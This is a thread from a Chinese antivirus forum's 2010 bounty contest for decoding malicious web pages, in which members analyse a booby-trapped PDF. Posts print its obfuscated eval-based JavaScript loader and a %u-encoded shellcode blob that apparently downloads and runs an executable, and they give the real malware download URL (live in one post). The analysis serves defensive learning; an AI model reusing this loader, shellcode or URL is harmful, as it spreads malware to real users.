瑞星卡卡安全论坛技术交流区恶意网站交流 网马解密悬赏第四十八期(已结束)

123   1  /  3  页   跳转

[悬赏] 网马解密悬赏第四十八期(已结束)

收藏
本主题由 大版主 networkedition 于 2010-4-12 10:13:48 执行 关闭主题/取消 操作
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2010-04-09 11:03 | 只看楼主 短消息 资料
字号: 1楼

网马解密悬赏第四十八期(已结束)



引用:
解密文件见附件,请使用老版的redoce进行解密,工具见附件




引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        http://www.cha88.cn/

   

引用:
注:论坛所有会员均可参加,严禁使用md的自动解密功能


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)

附件附件:

文件名:d4759d.rar
下载次数:7705
文件类型:application/octet-stream
文件大小:
上传时间:2010-4-9 11:02:49
描述:rar

附件附件:

文件名:decoder.rar
下载次数:438
文件类型:application/octet-stream
文件大小:
上传时间:2010-4-9 11:02:49
描述:rar

最后编辑networkedition 最后编辑于 2010-04-12 10:13:01
分享到:
gototop
 
Cool_wXd
头像
初生襁褓狮
  • 帖子:66
  • 注册: 2009-06-25
  • 来自:
发表于: 2010-04-09 15:36 | 短消息 资料
字号: 2楼

回复:网马解密悬赏第四十八期

还没人上,我给你捧场吧~

[复制到剪贴板]
CODE:
hxxp://jkhteqa.com:3126/download/banner.php?spl=pdf_2013


本帖被评分 1 次
gototop
 
kekao
头像
快乐黄口狮
  • 帖子:151
  • 注册: 2008-03-08
  • 来自:
发表于: 2010-04-09 17:48 | 短消息 资料
字号: 3楼

回复: 网马解密悬赏第四十八期

没看明白.解压后,只看到  var googleA=this;var send=["","e","l","a","v"];unlock=new String(send[1]+send[4]+send[3]+send[2]+send[0]);var a=["Word","","getPa","geNth"];unlockAdobe=new String(a[2]+a[3]+a[0]+a[1]);var getAdobe=["Pag","mWo","get","rds","eNu",""];mail=new String(getAdobe[2]+getAdobe[0]+getAdobe[4]+getAdobe[1]+getAdobe[3]+getAdobe[5]);var b=["s","n","a","e","c","u","e","p",""];d=new String(b[5]+b[1]+b[3]+b[0]+b[4]+b[2]+b[7]+b[3]+b[8]);var google=["deA","cha","rCo","t",""];mailGoogle=new String(google[1]+google[2]+google[0]+google[3]+google[4]);var googleC=["","harCo","fromC","de"];dD=new String(googleC[2]+googleC[1]+googleC[3]+googleC[0]);var googleGet=["a","p","","p"];get=new String(googleGet[0]+googleGet[1]+googleGet[1]+googleGet[2]);var adobe=String("%");var aA=2;var mailGet=String;var bB=0;var editSend=100;var get=googleA[get];var getD=2;var aEdit=googleA[d];var c=googleA[mail](getD);var googleB="";for(var googleCUnlock=bB;googleCUnlock<c;googleCUnlock+=1){sendD=googleA[unlockAdobe](getD,googleCUnlock);var adobeD=sendD.substr(sendD.length-aA,aA);var googleMail=aEdit(adobe+adobeD);var sendDSend=googleMail[mailGoogle](bB);var mailB=sendDSend^editSend;googleB+=mailGet[dD](mailB);}this[unlock](googleB);

真不知是如何解出地址来的.
gototop
 
念初
头像
强壮不惑狮
  • 帖子:1021
  • 注册: 2005-07-03
  • 来自:病毒大染缸
论坛9周年纪念10温馨圣诞十周年
发表于: 2010-04-09 20:52 | 短消息 资料
字号: 4楼

回复: 网马解密悬赏第四十八期

哎呀我又干了件傻事
忘了清空缓存了,解了一个原来的pdf。。。

hxxp://jkhteqa.com:3126/download/banner.php?spl=pdf_2013]http://jkhteqa.com:3126/download/banner.php?spl=pdf_2013



汗死

疯了疯了。。。。禁用url识别也不好使,改成hxxp行了吧
最后编辑念初 最后编辑于 2010-04-09 21:48:11
感染不是你的错
不能修复就是你的不对了
遇到问题请附截图和sreng日志
gototop
 
辛达星郁
头像
锋芒艾服狮
  • 帖子:1507
  • 注册: 2008-07-17
  • 来自:
就爱不长大论坛9周年纪念
发表于: 2010-04-09 20:55 | 短消息 资料
字号: 5楼

回复: 网马解密悬赏第四十八期

在线解密http://wepawet.iseclab.org/index.php

http://jkhteqa.com:3126/download/banner.php?spl=pdf_2013
要深入,要专一.......
gototop
 
梅罗
头像
自信弱冠狮
  • 帖子:430
  • 注册: 2010-01-18
  • 来自:永烁星光之地
论坛9周年纪念
发表于: 2010-04-10 15:58 | 短消息 资料
字号: 6楼

回复:网马解密悬赏第四十八期

来晚了
得到PDF代码之后 发现是 eval 加密
解密之后得到一段shellcode代码

[复制到剪贴板]
CODE:
%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455


生成exe之后OD调试得到
hxxp://jkhteqa.com:3126/download/banner.php?spl=pdf_2013
最后编辑梅罗 最后编辑于 2010-04-10 17:52:00
天地间那一抹不灭的流光 即我
gototop
 
无情‰风
头像
初生襁褓狮
  • 帖子:18
  • 注册: 2010-04-10
  • 来自:
发表于: 2010-04-10 16:06 | 短消息 资料
字号: 7楼

回复:网马解密悬赏第四十八期

这是什么东东?
gototop
 
kekao
头像
快乐黄口狮
  • 帖子:151
  • 注册: 2008-03-08
  • 来自:
发表于: 2010-04-10 16:17 | 短消息 资料
字号: 8楼

回复 6F 梅罗 的帖子

膜拜一下.得到PDF代码之后 发现是 eval 加密
如何看出来的.?
gototop
 
梅罗
头像
自信弱冠狮
  • 帖子:430
  • 注册: 2010-01-18
  • 来自:永烁星光之地
论坛9周年纪念
发表于: 2010-04-10 16:53 | 短消息 资料
字号: 9楼

回复: 网马解密悬赏第四十八期



[复制到剪贴板]
CODE:
var googleA=this;var send=["","e","l","a","v"];unlock=new String(send[1]+send[4]+send[3]+send[2]+send[0]);var a=["Word","","getPa","geNth"];unlockAdobe=new String(a[2]+a[3]+a[0]+a[1]);var getAdobe=["Pag","mWo","get","rds","eNu",""];mail=new String(getAdobe[2]+getAdobe[0]+getAdobe[4]+getAdobe[1]+getAdobe[3]+getAdobe[5]);var b=["s","n","a","e","c","u","e","p",""];d=new String(b[5]+b[1]+b[3]+b[0]+b[4]+b[2]+b[7]+b[3]+b[8]);var google=["deA","cha","rCo","t",""];mailGoogle=new String(google[1]+google[2]+google[0]+google[3]+google[4]);var googleC=["","harCo","fromC","de"];dD=new String(googleC[2]+googleC[1]+googleC[3]+googleC[0]);var googleGet=["a","p","","p"];get=new String(googleGet[0]+googleGet[1]+googleGet[1]+googleGet[2]);var adobe=String("%");var aA=2;var mailGet=String;var bB=0;var editSend=100;var get=googleA[get];var getD=2;var aEdit=googleA[d];var c=googleA[mail](getD);var googleB="";for(var googleCUnlock=bB;googleCUnlock<c;googleCUnlock+=1){sendD=googleA[unlockAdobe](getD,googleCUnlock);var adobeD=sendD.substr(sendD.length-aA,aA);var googleMail=aEdit(adobe+adobeD);var sendDSend=googleMail[mailGoogle](bB);var mailB=sendDSend^editSend;googleB+=mailGet[dD](mailB);}this[unlock](googleB);


var send=["","e","l","a","v"];unlock=new String(send[1]+send[4]+send[3]+send[2]+send[0]);
即是 unlock = eval ;
再看末尾:this[unlock](googleB);
即是:this[eval](googleB);
第一怀疑的就是eval加密,然后加密代码在eval弹出的窗口里
最后编辑梅罗 最后编辑于 2010-04-10 16:54:06
天地间那一抹不灭的流光 即我
gototop
 
kekao
头像
快乐黄口狮
  • 帖子:151
  • 注册: 2008-03-08
  • 来自:
发表于: 2010-04-10 18:24 | 短消息 资料
字号: 10楼

回复 9F 梅罗 的帖子

这一段就能解出?
gototop
 
<<上一主题|下一主题>>
123   1  /  3  页   跳转
页面顶部
Powered by Discuz!NT